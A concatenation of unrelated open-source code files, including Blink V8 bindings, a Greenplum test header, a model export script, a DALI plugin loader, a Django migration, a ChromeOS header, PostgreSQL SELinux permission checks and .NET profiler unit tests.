V8SetReturnValue(info, info.Holder());
return;
}
V8TestInterfaceConstructor4::ConstructorCustom(info);
}
} // namespace test_interface_constructor_4_v8_internal
static void InstallV8TestInterfaceConstructor4Template(
v8::Isolate* isolate,
const DOMWrapperWorld& world,
v8::Local<v8::FunctionTemplate> interface_template) {
// Initialize the interface object's template.
V8DOMConfiguration::InitializeDOMInterfaceTemplate(isolate, interface_template, V8TestInterfaceConstructor4::GetWrapperTypeInfo()->interface_name, v8::Local<v8::FunctionTemplate>(), V8TestInterfaceConstructor4::kInternalFieldCount);
interface_template->SetCallHandler(test_interface_constructor_4_v8_internal::ConstructorCallback);
interface_template->SetLength(1);
v8::Local<v8::Signature> signature = v8::Signature::New(isolate, interface_template);
ALLOW_UNUSED_LOCAL(signature);
v8::Local<v8::ObjectTemplate> instance_template = interface_template->InstanceTemplate();
ALLOW_UNUSED_LOCAL(instance_template);
v8::Local<v8::ObjectTemplate> prototype_template = interface_template->PrototypeTemplate();
ALLOW_UNUSED_LOCAL(prototype_template);
// Register IDL constants, attributes and operations.
// Custom signature
V8TestInterfaceConstructor4::InstallRuntimeEnabledFeaturesOnTemplate(
isolate, world, interface_template);
}
void V8TestInterfaceConstructor4::InstallRuntimeEnabledFeaturesOnTemplate(
v8::Isolate* isolate,
const DOMWrapperWorld& world,
v8::Local<v8::FunctionTemplate> interface_template) {
v8::Local<v8::Signature> signature = v8::Signature::New(isolate, interface_template);
ALLOW_UNUSED_LOCAL(signature);
v8::Local<v8::ObjectTemplate> instance_template = interface_template->InstanceTemplate();
ALLOW_UNUSED_LOCAL(instance_template);
v8::Local<v8::ObjectTemplate> prototype_template = interface_template->PrototypeTemplate();
ALLOW_UNUSED_LOCAL(prototype_template);
// Register IDL constants, attributes and operations.
// Custom signature
}
v8::Local<v8::FunctionTemplate> V8TestInterfaceConstructor4::DomTemplate(
v8::Isolate* isolate, const DOMWrapperWorld& world) {
return V8DOMConfiguration::DomClassTemplate(
isolate, world, const_cast<WrapperTypeInfo*>(V8TestInterfaceConstructor4::GetWrapperTypeInfo()),
InstallV8TestInterfaceConstructor4Template);
}
bool V8TestInterfaceConstructor4::HasInstance(v8::Local<v8::Value> v8_value, v8::Isolate* isolate) {
return V8PerIsolateData::From(isolate)->HasInstance(V8TestInterfaceConstructor4::GetWrapperTypeInfo(), v8_value);
}
v8::Local<v8::Object> V8TestInterfaceConstructor4::FindInstanceInPrototypeChain(
v8::Local<v8::Value> v8_value, v8::Isolate* isolate) {
return V8PerIsolateData::From(isolate)->FindInstanceInPrototypeChain(
V8TestInterfaceConstructor4::GetWrapperTypeInfo(), v8_value);
}
TestInterfaceConstructor4* V8TestInterfaceConstructor4::ToImplWithTypeCheck(
v8::Isolate* isolate, v8::Local<v8::Value> value) {
return HasInstance(value, isolate) ? ToImpl(v8::Local<v8::Object>::Cast(value)) : nullptr;
}
} // namespace blink
| 3,380 |
5,535 |
<gh_stars>1000+
//---------------------------------------------------------------------------
// Greenplum Database
// Copyright (C) 2012 EMC Corp.
//
// @filename:
// CCorrelatedExecutionTest.h
//
// @doc:
// Test for correlated subqueries
//---------------------------------------------------------------------------
#ifndef GPOPT_CCorrelatedExecutionTest_H
#define GPOPT_CCorrelatedExecutionTest_H
#include "gpos/base.h"
#include "gpos/common/CDynamicPtrArray.h"
#include "gpos/common/CRefCount.h"
#include "gpos/string/CWStringDynamic.h"
#include "gpopt/base/CColRef.h"
#include "gpopt/base/CDrvdProp.h"
#include "gpopt/base/CPrintPrefix.h"
#include "gpopt/operators/CExpression.h"
#include "gpopt/operators/COperator.h"
// forward declarations
namespace gpdxl
{
using IntPtrArray = CDynamicPtrArray<INT, CleanupDelete>;
}
namespace gpopt
{
//---------------------------------------------------------------------------
// @class:
// CCorrelatedExecutionTest
//
// @doc:
// Tests for converting Apply expressions into NL expressions
//
//---------------------------------------------------------------------------
class CCorrelatedExecutionTest
{
private:
// counter used to mark last successful test
static ULONG m_ulTestCounter;
public:
// unittests
static GPOS_RESULT EresUnittest();
static GPOS_RESULT EresUnittest_RunAllPositiveTests();
}; // class CCorrelatedExecutionTest
} // namespace gpopt
#endif // !GPOPT_CCorrelatedExecutionTest_H
// EOF
| 453 |
775 |
<reponame>ntyukaev/training_extensions<gh_stars>100-1000
"""
Model exporting tool.
"""
# Copyright (C) 2021 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions
# and limitations under the License.
import argparse
import os
from ote_sdk.configuration.helper import create
from ote_sdk.entities.model import ModelEntity, ModelOptimizationType
from ote_sdk.entities.task_environment import TaskEnvironment
from ote_sdk.usecases.adapters.model_adapter import ModelAdapter
from ote_sdk.usecases.tasks.interfaces.export_interface import ExportType
from ote_cli.registry import find_and_parse_model_template
from ote_cli.utils.importing import get_impl_class
from ote_cli.utils.io import read_binary, read_label_schema, save_model_data
from ote_cli.utils.nncf import is_checkpoint_nncf
def parse_args():
"""
Parses command line arguments.
"""
parser = argparse.ArgumentParser()
parser.add_argument("template")
parser.add_argument(
"--load-weights",
required=True,
help="Load only weights from previously saved checkpoint",
)
parser.add_argument(
"--save-model-to",
required="True",
help="Location where exported model will be stored.",
)
return parser.parse_args()
def main():
"""
Main function that is used for model exporting.
"""
args = parse_args()
# Load template.yaml file.
template = find_and_parse_model_template(args.template)
# Get class for Task.
is_nncf = is_checkpoint_nncf(args.load_weights)
task_class = get_impl_class(
template.entrypoints.nncf if is_nncf else template.entrypoints.base
)
# Get hyper parameters schema.
hyper_parameters = create(template.hyper_parameters.data)
assert hyper_parameters
environment = TaskEnvironment(
model=None,
hyper_parameters=hyper_parameters,
label_schema=read_label_schema(args.load_weights),
model_template=template,
)
model_adapters = {"weights.pth": ModelAdapter(read_binary(args.load_weights))}
model = ModelEntity(
configuration=environment.get_model_configuration(),
model_adapters=model_adapters,
train_dataset=None,
optimization_type=ModelOptimizationType.NNCF
if is_nncf
else ModelOptimizationType.NONE,
)
environment.model = model
task = task_class(task_environment=environment)
exported_model = ModelEntity(None, environment.get_model_configuration())
task.export(ExportType.OPENVINO, exported_model)
os.makedirs(args.save_model_to, exist_ok=True)
save_model_data(exported_model, args.save_model_to)
if __name__ == "__main__":
main()
| 1,110 |
360 |
<filename>contrib/sepgsql/proc.cpp
/* -------------------------------------------------------------------------
*
* contrib/sepgsql/proc.c
*
* Routines corresponding to procedure objects
*
* Copyright (c) 2010-2012, PostgreSQL Global Development Group
*
* -------------------------------------------------------------------------
*/
#include "postgres.h"
#include "knl/knl_variable.h"
#include "access/genam.h"
#include "access/heapam.h"
#include "access/sysattr.h"
#include "catalog/dependency.h"
#include "catalog/indexing.h"
#include "catalog/pg_namespace.h"
#include "catalog/pg_proc.h"
#include "commands/seclabel.h"
#include "utils/builtins.h"
#include "utils/fmgroids.h"
#include "utils/lsyscache.h"
#include "utils/tqual.h"
#include "sepgsql.h"
/*
* sepgsql_proc_post_create
*
* This routine assigns a default security label on a newly defined
* procedure.
*/
void sepgsql_proc_post_create(Oid functionId)
{
Relation rel;
ScanKeyData skey;
SysScanDesc sscan;
HeapTuple tuple;
char* scontext = NULL;
char* tcontext = NULL;
char* ncontext = NULL;
int i;
StringInfoData audit_name;
ObjectAddress object;
Form_pg_proc proForm;
/*
* Fetch namespace of the new procedure. Because pg_proc entry is not
* visible right now, we need to scan the catalog using SnapshotSelf.
*/
rel = heap_open(ProcedureRelationId, AccessShareLock);
ScanKeyInit(&skey, ObjectIdAttributeNumber, BTEqualStrategyNumber, F_OIDEQ, ObjectIdGetDatum(functionId));
sscan = systable_beginscan(rel, ProcedureOidIndexId, true, SnapshotSelf, 1, &skey);
tuple = systable_getnext(sscan);
if (!HeapTupleIsValid(tuple))
elog(ERROR, "catalog lookup failed for proc %u", functionId);
proForm = (Form_pg_proc)GETSTRUCT(tuple);
/*
* check db_schema:{add_name} permission of the namespace
*/
object.classId = NamespaceRelationId;
object.objectId = proForm->pronamespace;
object.objectSubId = 0;
sepgsql_avc_check_perms(
&object, SEPG_CLASS_DB_SCHEMA, SEPG_DB_SCHEMA__ADD_NAME, getObjectDescription(&object), true);
/*
* XXX - db_language:{implement} also should be checked here
*/
/*
* Compute a default security label when we create a new procedure object
* under the specified namespace.
*/
scontext = sepgsql_get_client_label();
tcontext = sepgsql_get_label(NamespaceRelationId, proForm->pronamespace, 0);
ncontext = sepgsql_compute_create(scontext, tcontext, SEPG_CLASS_DB_PROCEDURE);
/*
* check db_procedure:{create} permission
*/
initStringInfo(&audit_name);
appendStringInfo(&audit_name, "function %s(", NameStr(proForm->proname));
for (i = 0; i < proForm->pronargs; i++) {
Oid typeoid = proForm->proargtypes.values[i];
if (i > 0)
appendStringInfoChar(&audit_name, ',');
appendStringInfoString(&audit_name, format_type_be(typeoid));
}
appendStringInfoChar(&audit_name, ')');
sepgsql_avc_check_perms_label(ncontext, SEPG_CLASS_DB_PROCEDURE, SEPG_DB_PROCEDURE__CREATE, audit_name.data, true);
/*
* Assign the default security label on a new procedure
*/
object.classId = ProcedureRelationId;
object.objectId = functionId;
object.objectSubId = 0;
SetSecurityLabel(&object, SEPGSQL_LABEL_TAG, ncontext);
/*
* Cleanup
*/
systable_endscan(sscan);
heap_close(rel, AccessShareLock);
pfree(audit_name.data);
pfree(tcontext);
pfree(ncontext);
}
/*
* sepgsql_proc_drop
*
* It checks privileges to drop the supplied function.
*/
void sepgsql_proc_drop(Oid functionId)
{
ObjectAddress object;
char* audit_name = NULL;
/*
* check db_schema:{remove_name} permission
*/
object.classId = NamespaceRelationId;
object.objectId = get_func_namespace(functionId);
object.objectSubId = 0;
audit_name = getObjectDescription(&object);
sepgsql_avc_check_perms(&object, SEPG_CLASS_DB_SCHEMA, SEPG_DB_SCHEMA__REMOVE_NAME, audit_name, true);
pfree(audit_name);
/*
* check db_procedure:{drop} permission
*/
object.classId = ProcedureRelationId;
object.objectId = functionId;
object.objectSubId = 0;
audit_name = getObjectDescription(&object);
sepgsql_avc_check_perms(&object, SEPG_CLASS_DB_PROCEDURE, SEPG_DB_PROCEDURE__DROP, audit_name, true);
pfree(audit_name);
}
/*
* sepgsql_proc_relabel
*
* It checks privileges to relabel the supplied function
* by the `seclabel'.
*/
void sepgsql_proc_relabel(Oid functionId, const char* seclabel)
{
ObjectAddress object;
char* audit_name = NULL;
object.classId = ProcedureRelationId;
object.objectId = functionId;
object.objectSubId = 0;
audit_name = getObjectDescription(&object);
/*
* check db_procedure:{setattr relabelfrom} permission
*/
sepgsql_avc_check_perms(&object,
SEPG_CLASS_DB_PROCEDURE,
SEPG_DB_PROCEDURE__SETATTR | SEPG_DB_PROCEDURE__RELABELFROM,
audit_name,
true);
/*
* check db_procedure:{relabelto} permission
*/
sepgsql_avc_check_perms_label(seclabel, SEPG_CLASS_DB_PROCEDURE, SEPG_DB_PROCEDURE__RELABELTO, audit_name, true);
pfree(audit_name);
}
| 2,063 |
3,967 |
# Copyright (c) 2020, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import tensorflow as tf
import os
import glob
import re
_dali_tf_module = None
def load_dali_tf_plugin():
global _dali_tf_module
if _dali_tf_module is not None:
return _dali_tf_module
import nvidia.dali # Make sure DALI lib is loaded
tf_plugins = glob.glob(os.path.join(os.path.dirname(os.path.realpath(__file__)), 'libdali_tf*.so'))
# Order: 'current', prebuilt for current TF version, prebuilt for other TF versions
tf_version = re.search("(\d+.\d+).\d+", tf.__version__).group(1)
tf_version_underscore = tf_version.replace('.', '_')
dali_tf_current = list(filter(lambda x: 'current' in x, tf_plugins))
dali_tf_prebuilt_tf_ver = list(filter(lambda x: tf_version_underscore in x, tf_plugins))
dali_tf_prebuilt_others = list(filter(lambda x: 'current' not in x and tf_version_underscore not in x, tf_plugins))
processed_tf_plugins = dali_tf_current + dali_tf_prebuilt_tf_ver + dali_tf_prebuilt_others
first_error = None
for libdali_tf in processed_tf_plugins:
try:
_dali_tf_module = tf.load_op_library(libdali_tf)
break
# if plugin is not compatible skip it
except tf.errors.NotFoundError as error:
if first_error is None:
first_error = error
else:
raise first_error or Exception('No matching DALI plugin found for installed TensorFlow version')
return _dali_tf_module
| 739 |
852 |
import FWCore.ParameterSet.Config as cms
from Configuration.Eras.Era_Run2_25ns_cff import Run2_25ns
from Configuration.Eras.Modifier_tracker_apv_vfp30_2016_cff import tracker_apv_vfp30_2016
Run2_25ns_HIPM = cms.ModifierChain(Run2_25ns, tracker_apv_vfp30_2016)
| 108 |
657 |
<reponame>sndp487/rescuekerala
# Generated by Django 2.2.11 on 2020-06-21 11:55
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
("mainapp", "0112_auto_20200531_2242"),
]
operations = [
migrations.AlterField(model_name="hashtag", name="name", field=models.CharField(max_length=20, unique=True),),
]
| 152 |
575 |
<gh_stars>100-1000
// Copyright 2018 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#ifndef CHROME_BROWSER_CHROMEOS_POWER_AUTO_SCREEN_BRIGHTNESS_BRIGHTNESS_MONITOR_H_
#define CHROME_BROWSER_CHROMEOS_POWER_AUTO_SCREEN_BRIGHTNESS_BRIGHTNESS_MONITOR_H_
#include "base/observer_list_types.h"
namespace chromeos {
namespace power {
namespace auto_screen_brightness {
// Interface for monitoring the screen brightness.
class BrightnessMonitor {
public:
// These values are persisted to logs. Entries should not be renumbered and
// numeric values should never be reused.
enum class Status {
kInitializing = 0,
kSuccess = 1,
kDisabled = 2,
kMaxValue = kDisabled
};
class Observer : public base::CheckedObserver {
public:
Observer() = default;
~Observer() override = default;
// Called when BrightnessMonitor is initialized.
virtual void OnBrightnessMonitorInitialized(bool success) = 0;
// Called soon after the screen brightness is changed in response to a user
// request. Rapid changes are not reported; only the final change in a
// sequence will be sent. The |old_brightness_percent| is the brightness
// value just before user requested the change, and |new_brightness_percent|
// is the final/consolidated brightness value after the change.
virtual void OnUserBrightnessChanged(double old_brightness_percent,
double new_brightness_percent) = 0;
// Called for every user request, i.e. it's not consolidated like
// |OnUserBrightnessChanged|.
virtual void OnUserBrightnessChangeRequested() = 0;
private:
DISALLOW_COPY_AND_ASSIGN(Observer);
};
virtual ~BrightnessMonitor() = default;
// Adds or removes an observer.
virtual void AddObserver(Observer* observer) = 0;
virtual void RemoveObserver(Observer* observer) = 0;
};
} // namespace auto_screen_brightness
} // namespace power
} // namespace chromeos
#endif // CHROME_BROWSER_CHROMEOS_POWER_AUTO_SCREEN_BRIGHTNESS_BRIGHTNESS_MONITOR_H_
| 702 |
1,090 |
#include "stdafx.h"
#include "TestProfilerInfo.h"
#include "MockProfilerInfo.h"
#include "ComBaseTest.h"
using ::testing::_;
using ::testing::Return;
using ::testing::Invoke;
class ProfilerInfoBaseTest : public ComBaseTest {
public:
ProfilerInfoBaseTest() : mockProfilerInfo_(nullptr),
testProfilerInfo_(nullptr)
{
}
private:
void SetUp() override
{
CreateComObject(&testProfilerInfo_);
CreateComObject(&mockProfilerInfo_);
testProfilerInfo_->ChainProfilerInfo(mockProfilerInfo_);
}
void TearDown() override
{
ASSERT_EQ(0, testProfilerInfo_->Release());
ASSERT_EQ(0, mockProfilerInfo_->Release());
}
protected:
CComObject<MockProfilerInfo> *mockProfilerInfo_;
CComObject<CTestProfilerInfo> *testProfilerInfo_;
};
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_HasHookedAllAvailableInterfaces)
{
ASSERT_EQ(8, mockProfilerInfo_->Release());
ASSERT_EQ(9, mockProfilerInfo_->AddRef());
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_GetClassFromObject_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, GetClassFromObject(_, _))
.WillByDefault(Invoke([this](/* [in] */ ObjectID objectId,
/* [out] */ ClassID *pClassId) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, GetClassFromObject(_, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->GetClassFromObject(0, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_GetClassFromToken_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, GetClassFromToken(_, _, _))
.WillByDefault(Invoke([this](/* [in] */ ModuleID moduleId,
/* [in] */ mdTypeDef typeDef,
/* [out] */ ClassID *pClassId) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, GetClassFromToken(_, _, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->GetClassFromToken(0, 0, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_GetCodeInfo_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, GetCodeInfo(_, _, _))
.WillByDefault(Invoke([this](/* [in] */ FunctionID functionId,
/* [out] */ LPCBYTE *pStart,
/* [out] */ ULONG *pcSize) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, GetCodeInfo(_, _, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->GetCodeInfo(0, nullptr, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_GetEventMask_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, GetEventMask(_))
.WillByDefault(Invoke([this](/* [out] */ DWORD *pdwEvents) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, GetEventMask(_)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->GetEventMask(nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_GetFunctionFromIP_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, GetFunctionFromIP(_, _))
.WillByDefault(Invoke([this](/* [in] */ LPCBYTE ip,
/* [out] */ FunctionID *pFunctionId) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, GetFunctionFromIP(_, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->GetFunctionFromIP(nullptr, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_GetFunctionFromToken_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, GetFunctionFromToken(_, _, _))
.WillByDefault(Invoke([this](/* [in] */ ModuleID moduleId,
/* [in] */ mdToken token,
/* [out] */ FunctionID *pFunctionId) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, GetFunctionFromToken(_, _, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->GetFunctionFromToken(0, 0, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_GetHandleFromThread_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, GetHandleFromThread(_, _))
.WillByDefault(Invoke([this](/* [in] */ ThreadID threadId,
/* [out] */ HANDLE *phThread) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, GetHandleFromThread(_, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->GetHandleFromThread(0, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_GetObjectSize_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, GetObjectSize(_, _))
.WillByDefault(Invoke([this](/* [in] */ ObjectID objectId,
/* [out] */ ULONG *pcSize) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, GetObjectSize(_, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->GetObjectSize(0, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_IsArrayClass_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, IsArrayClass(_, _, _, _))
.WillByDefault(Invoke([this](/* [in] */ ClassID classId,
/* [out] */ CorElementType *pBaseElemType,
/* [out] */ ClassID *pBaseClassId,
/* [out] */ ULONG *pcRank) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, IsArrayClass(_, _, _, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->IsArrayClass(0, nullptr, nullptr, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_GetThreadInfo_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, GetThreadInfo(_, _))
.WillByDefault(Invoke([this](/* [in] */ ThreadID threadId,
/* [out] */ DWORD *pdwWin32ThreadId) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, GetThreadInfo(_, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->GetThreadInfo(0, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_GetCurrentThreadID_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, GetCurrentThreadID(_))
.WillByDefault(Invoke([this](/* [out] */ ThreadID *pThreadId) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, GetCurrentThreadID(_)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->GetCurrentThreadID(nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_GetClassIDInfo_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, GetClassIDInfo(_, _, _))
.WillByDefault(Invoke([this](/* [in] */ ClassID classId,
/* [out] */ ModuleID *pModuleId,
/* [out] */ mdTypeDef *pTypeDefToken) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, GetClassIDInfo(_, _, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->GetClassIDInfo(0, nullptr, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_GetFunctionInfo_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, GetFunctionInfo(_, _, _, _))
.WillByDefault(Invoke([this](/* [in] */ FunctionID functionId,
/* [out] */ ClassID *pClassId,
/* [out] */ ModuleID *pModuleId,
/* [out] */ mdToken *pToken) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, GetFunctionInfo(_, _, _, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->GetFunctionInfo(0, nullptr, nullptr, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_SetEventMask_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, SetEventMask(_))
.WillByDefault(Invoke([this](/* [in] */ DWORD dwEvents) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, SetEventMask(_)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->SetEventMask(0));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_SetEnterLeaveFunctionHooks_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, SetEnterLeaveFunctionHooks(_, _, _))
.WillByDefault(Invoke([this](/* [in] */ FunctionEnter *pFuncEnter,
/* [in] */ FunctionLeave *pFuncLeave,
/* [in] */ FunctionTailcall *pFuncTailcall) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, SetEnterLeaveFunctionHooks(_, _, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->SetEnterLeaveFunctionHooks(nullptr, nullptr, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_SetFunctionIDMapper_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, SetFunctionIDMapper(_))
.WillByDefault(Invoke([this](/* [in] */ FunctionIDMapper *pFunc) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, SetFunctionIDMapper(_)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->SetFunctionIDMapper(nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_GetTokenAndMetaDataFromFunction_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, GetTokenAndMetaDataFromFunction(_, _, _, _))
.WillByDefault(Invoke([this](/* [in] */ FunctionID functionId,
/* [in] */ REFIID riid,
/* [out] */ IUnknown **ppImport,
/* [out] */ mdToken *pToken) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, GetTokenAndMetaDataFromFunction(_, _, _, _)).Times(1);
GUID guid;
ASSERT_EQ(S_OK, testProfilerInfo_->GetTokenAndMetaDataFromFunction(0, guid, nullptr, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_GetModuleInfo_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, GetModuleInfo(_, _, _, _, _, _))
.WillByDefault(Invoke([this](/* [in] */ ModuleID moduleId,
/* [out] */ LPCBYTE *ppBaseLoadAddress,
/* [in] */ ULONG cchName,
/* [out] */ ULONG *pcchName,
/* [annotation][out] */
_Out_writes_to_(cchName, *pcchName) WCHAR szName[],
/* [out] */ AssemblyID *pAssemblyId) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, GetModuleInfo(_, _, _, _, _, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->GetModuleInfo(0, nullptr, 0, nullptr, nullptr, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_GetModuleMetaData_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, GetModuleMetaData(_, _, _, _))
.WillByDefault(Invoke([this](/* [in] */ ModuleID moduleId,
/* [in] */ DWORD dwOpenFlags,
/* [in] */ REFIID riid,
/* [out] */ IUnknown **ppOut) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, GetModuleMetaData(_, _, _, _)).Times(1);
GUID guid;
ASSERT_EQ(S_OK, testProfilerInfo_->GetModuleMetaData(0, 0, guid, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_GetILFunctionBody_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, GetILFunctionBody(_, _, _, _))
.WillByDefault(Invoke([this](/* [in] */ ModuleID moduleId,
/* [in] */ mdMethodDef methodId,
/* [out] */ LPCBYTE *ppMethodHeader,
/* [out] */ ULONG *pcbMethodSize) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, GetILFunctionBody(_, _, _, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->GetILFunctionBody(0, 0, nullptr, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_GetILFunctionBodyAllocator_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, GetILFunctionBodyAllocator(_, _))
.WillByDefault(Invoke([this](/* [in] */ ModuleID moduleId,
/* [out] */ IMethodMalloc **ppMalloc) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, GetILFunctionBodyAllocator(_, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->GetILFunctionBodyAllocator(0, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_SetILFunctionBody_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, SetILFunctionBody(_, _, _))
.WillByDefault(Invoke([this](/* [in] */ ModuleID moduleId,
/* [in] */ mdMethodDef methodid,
/* [in] */ LPCBYTE pbNewILMethodHeader) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, SetILFunctionBody(_, _, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->SetILFunctionBody(0, 0, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_GetAppDomainInfo_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, GetAppDomainInfo(_, _, _, _, _))
.WillByDefault(Invoke([this](/* [in] */ AppDomainID appDomainId,
/* [in] */ ULONG cchName,
/* [out] */ ULONG *pcchName,
/* [annotation][out] */
_Out_writes_to_(cchName, *pcchName) WCHAR szName[],
/* [out] */ ProcessID *pProcessId) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, GetAppDomainInfo(_, _, _, _, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->GetAppDomainInfo(0, 0, nullptr, nullptr, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_GetAssemblyInfo_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, GetAssemblyInfo(_, _, _, _, _, _))
.WillByDefault(Invoke([this](/* [in] */ AssemblyID assemblyId,
/* [in] */ ULONG cchName,
/* [out] */ ULONG *pcchName,
/* [annotation][out] */
_Out_writes_to_(cchName, *pcchName) WCHAR szName[],
/* [out] */ AppDomainID *pAppDomainId,
/* [out] */ ModuleID *pModuleId) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, GetAssemblyInfo(_, _, _, _, _, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->GetAssemblyInfo(0, 0, nullptr, nullptr, nullptr, nullptr));
}
